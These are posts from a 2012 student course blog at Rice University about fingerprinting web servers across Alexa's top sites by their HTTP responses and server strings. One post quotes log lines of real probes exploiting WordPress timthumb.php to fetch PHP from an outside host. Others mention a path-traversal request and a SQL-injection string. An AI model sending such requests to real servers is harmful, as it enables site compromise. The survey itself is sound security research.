Rice University logo
 
Top blue bar image
Or looking for known, fixed vulnerabilities on servers that should know better (and several that shouldn't)
 

Wrapping Up

November 30th, 2012 by Tad

We have now finished our analysis and are pulling the final details together.  We feel that we have some significant results to share – we were able to predict server types with a fairly high degree of accuracy based on responses to our queries, although our data was not fine-grained enough to distinguish between different versions of the same server.  We are working on summarizing the various findings already mentioned in the blog and putting things together into a final document that we will share here when it is complete.



Ongoing Analysis

November 26th, 2012 by Tad

In addition to accomplishing our stated goal of eating turkey, Martha and I made some additional progress last week. After a futile struggle to make use of the Weka data mining software, I returned to Python and produced a script that used Bayesian probability to calculate the likelyhood of any given server type given a particular response.

Building on that, we completed an analysis program that predicts the server type of any given site based on the responses that the server gives to our queries. Although more analysis remains to be done, the initial results look promising. In most cases our software agrees with the reported server type, but in many cases, the results are different. For example, most servers identifying themselves as IBM_HTTP_SERVER were recognized as Apache. At first this appeared to be a weakness in the software, but, as it turns out, IBM Http Server is, in fact, re-branded Apache, and this result showed that the program was behaving correctly.

Sites that refused to provide a server type were generally identified with one of the major server vendors. More interesting is a significant minority of sites that report using one of the major servers, but which are identified by our program as using another. Do these cases represent errors on the part of our analysis, or do the represent a pattern of some site administrators intentionally providing false version strings? Given the number of obviously false version strings, it seems likely that, at least in some cases, the latter is taking place.

This week, we will continue our analysis. Stay tuned for more results!



Unusual Server Responses

November 17th, 2012 by Tad

Just for fun, I thought I would post a few items to show the breadth of the servers that we surveyed.

  • http://www.skattelister.no responded to our relative request with a code from IETF RFC 2324 (2.3.2) indicating that it is, in fact, a teapot.  We find this response somewhat irregular as it is only supposed to be returned in response to a brew request for coffee.
  • Mailmta.com, running the Varnish server, reports status code 770 for all requests.  As this is one of the area codes for Atlanta, it makes me feel right at home.
  • Boisestate.edu is running the commodore64-HTTPD/1.1.  While we understand this to be a very efficient implementation, it may also point to the levels of education funding in Iowa.
  • CQNews.net is running server “unknow.”  Hopefully this does not reflect the purpose of their news room.
  • http://www.alittihad.co.ae runs on Nintendo
  • TravelingLuck.com run’s on what is reported as “My Arse.”  Our condolences to the webmaster.
  • We have already mentioned reddit.com’s SQL injection string
  • The Orthodox Jewish web site vosizneias.com has some high powered security.  Their server string? “In Hashem We Trust.”
  • Citibank Thailand runs their insecure server on “unkown” software
  • Expensify.com reports “All your base are belong to us”.  Hopefully the meme doesn’t express how they view your data.
  • LoveMoney.com is also holding tight on expenses.  They are running on Windows/3.11
  • and that’s only the tip of the iceberg!


Early Results

November 17th, 2012 by Tad

After 10 days of execution, we gathered responses from the Alexa top 100,000 servers. We also created a dataset from the bottom 10,000 in the Alexa top 1M, which gives us a sample of smaller web sites to analyze.

Today, we began our analysis work in earnest. In addition to statistical data on the prevalence of various web servers and versions, we found some surprising information regarding the behavior of servers when asked to provide an html document as a css style sheet. Of the top 100k servers, nearly 200 exhibited the behavior that, when asked for an HTML document as a CSS style sheet, they served up the HTML document – and reported it’s mime type as CSS. This would defeat any browser side security features aimed at preventing cross origin CSS attacks through mime type enforcement.

Most disturbingly, at least one of the sites that exhibited this behavior is a well known site that handles financial information, while others involve users logging on to provide other potentially sensitive information, including a site used primarily for political purposes.

Ongoing analysis will produce more interesting results. Stay tuned to this blog to find out more.



A quick update

November 11th, 2012 by Tad

We have now completed gathering the first dataset of the Alexa top 10,000. We are beginning analysis on that set, and are also in the proces of gathering data from the Alexa top 100,000. That will allow us to apply the techniques that we develop on a larger dataset, as well as look for differences between the more popular (and presumably more actively maintained) sites, and ones that are somewhat less so. We will still need to gather data from the “bottom 10,000” and embedded servers to get a fuller picture of what is out there on the web today.



Some real progress

November 6th, 2012 by Tad

Over the last weekend, Martha and I added some features to our spider that will enable it to gather the information needed for our analysis.  We expanded the spider to create a variety of different requests, allowing us to compare responses from different servers and compute a unique “fingerprint” for different server configurations.   At the present moment, I am running the spider on the Alexa Top 10,000 to get a big enough dataset to do some initial analysis and to begin to identify some of the potential security weaknesses that may be out there “in the wild.”

Here are the requests that the current spider makes against each server:

  • An ordinary get request against the root URL
  • A partial get request of 50 bytes against the root URL
  • A conditional get request for pages modified after a future date against the root URL
  • A head request against the root URL
  • An options request
  • A trace request against the root URL
  • A request for the root URL as a CSS stylesheet
  • A request for robots.txt as a CSS stylesheet
  • A request for a relative URL below the root directory
  • A request for the favicon

For each of these requests, we record the following fields:

  • The server version string
  • The response content type
  • The date of the response
  • The request method
  • The request URL
  • The response URL (often different due to redirects)
  • The request headers
  • The complete response headers
  • The reported content length
  • The actual length of the body (although there may be some character encoding issues that make our representation inaccurate)
  • The response status code

We have also prepared some analysis software in python that will catalog different responses for servers with the same server id string.  This may help us to identify servers sending a false version string as well as different configurations for different servers.

We are looking forward to continuing with our analysis, and seeing what meaningful data we are able to extract from our results.



First Steps

October 20th, 2012 by Tad

So we now have a primitive spider working!  You can see our code, which uses the Scrapy toolkit, at: https://github.com/tbook/comp527-serversurvey  Pretty ugly at this point, but hopefully we will have something nice by the end of the semester.

We made an initial attempt to crawl the Alexa top 500 and gather some basic data from the server headers.  You can see a survey of our initial results here.

Discovering all of the interesting headers sent back by the servers that we encountered prompted a slight change in our methodology – we will log all server headers, which will allow us to assemble a fairly complete directory of what headers are in use, and use them to classify servers.  We will also examine the date stamps to survey how many servers have the date correctly configured.

Some initial insights:

  • It seems that many servers are (understandably) guarded about sharing version information.  Many servers don’t give the version, and some don’t even share the name of the server.  Several return the helpful string “server”, or “confidential”
  • There is quite a variety of servers “in the wild.”  Apache has the largest share, but we observed the following other servers, as well: aris, BWS, GSE, gws, IBM, lighttpd, Microsoft-IIS, nginx, Netscape, PWS, Sun-Java-System-Web-Server, Tengine, and others.
  • Reddit.com seems to be trying a SQL exploit.  Their server string is: “‘; DROP TABLE servertypes; –“
  • Roughly 3/4 of servers provide charset information, which varies widely, with UTF-8 being the most common, but ISO-8859-1, GB2312, GBK, windows-1251, windows-1256, EUC-JP, EUC-KR, Shift_JIS, and Big5 also appearing.  gsmarena.com uses “None” for it’s charset, apparently giving you the freedom to interpret their content in the way that you find personally most satisfying.

That’s where we are right now.  Look for more updates in the coming weeks!



The HTTP Protocol

October 10th, 2012 by Tad

I have been looking over the HTTP Protocol version 1.1 (http://www.w3.org/Protocols/rfc2616/rfc2616.html) in order to try to get a sense of what parameters we should measure.  The first thing that I have observed is that the data that the server sends back depends on how we make the request.  Here are some examples from the Rice web server:

With no protocol specified, no headers are returned:

tbook@Athanasius:~$ telnet www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt
# Robot-exclusion file for chico.

With HTTP/1.0, we get a variety of headers

GET /robots.txt HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:30:51 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

With HTTP 1.1, we get an error (as expected) on our incomplete request

GET /robots.txt HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Wed, 10 Oct 2012 19:31:59 GMT
Server: Apache/2.2.12 (Unix)
Vary: Accept-Encoding
Content-Length: 226
Cneonction: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

If we give a complete request, we receive (nearly) the same headers

telnet> toggle crlf
Will send carriage returns as telnet <CR><LF>.
telnet> open www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt HTTP/1.1
User-Agent: Telnet
Host: www.rice.edu
Accept: text/html
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 20:04:41 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

The Accept field seems to be ignored:

GET /robots.txt HTTP/1.0
Accept: text/html
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:44:00 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

Other parts of the protocol seem not to be implemented:

Connected to www.netfu.rice.edu.
Escape character is '^]'.
OPTIONS
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Server error!</title>
...

Here is an initial list of some things we may want to test:

  • HTTP Version
  • Content type
  • Character set
  • Partial and conditional gets
  • Accept
  • Expect
  • TE (Transfer Encoding request)
  • Upgrade
  • HTTP GET / HEAD / OPTIONS / TRACE
  • Response of servers to various / malformed requests (both HTTP 1.0 and 1.1)
  • Behavior when a relative URL is requested; eg. GET /../etc/passwords

Other things would be interesting to test, but probably impractical, as they would require knowing a path to a resource of the appropriate type (which may not exist on the server)

  • Content Coding
  • Transfer Coding
  • Http PUT / POST / DELETE

				


Some Historical Data

October 10th, 2012 by Tad

I recently came across some historical data on server versions and updates that may be useful for our project.  In a survey of drive-by downloads (Niels Provos, Panayiotis Mavrommatis, Moheeb Rajab, Fabian Monrose. All Your iFrames Point to Us, 17th USENIX Security Symposium, (San Jose, CA, Aug. 2008).), the authors included the following data regarding some servers as of mid 2008:

Srv. Software count Unknown Up-to-date Old
Apache 55,088 26.5% 35.5% 38%
Microsoft IIS 113,905  n/a n/a n/a
Unknown 12,706 n/a n/a n/a

This data is only for servers that served as landing sites for malware distribution, and so it can’t be taken as representative of servers at the period. Still, it does provide a snapshot of the servers that were open to exploits at the time.



We aren’t the only ones surveying web servers!

October 8th, 2012 by Tad

Today, I had an interesting reminder that we are not the only ones surveying web servers. I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface into the database that I use for my LibriVox AudioBooks android app.  As it turns out, there were a few interesting requests that produced 404 errors.  Here they are, below:

184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0 

As it turns out, timthumb.php is a WordPress image resizing utility that has a security vulnerability that allows for arbitrary file uploads.  You can read about the weakness on the sucuri blog.  Of course, it’s no surprise that malicious agents are surveying web servers for vulnerabilities.  It’s just interesting to see it happening in practice.  Had my server used the offending library, I could now be hosting drive by downloads for some botnet.

I didn’t take the time to thoroughly investigate 184.107.145.18 or arztree.com (The ip address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan,) as I think it is safe to assume that the trail of any potential attacker will likely be well covered.  Still, the fact of the probing is a reminder that our survey in some way will mirror the efforts of various agents looking for weaknesses in web infrastructure.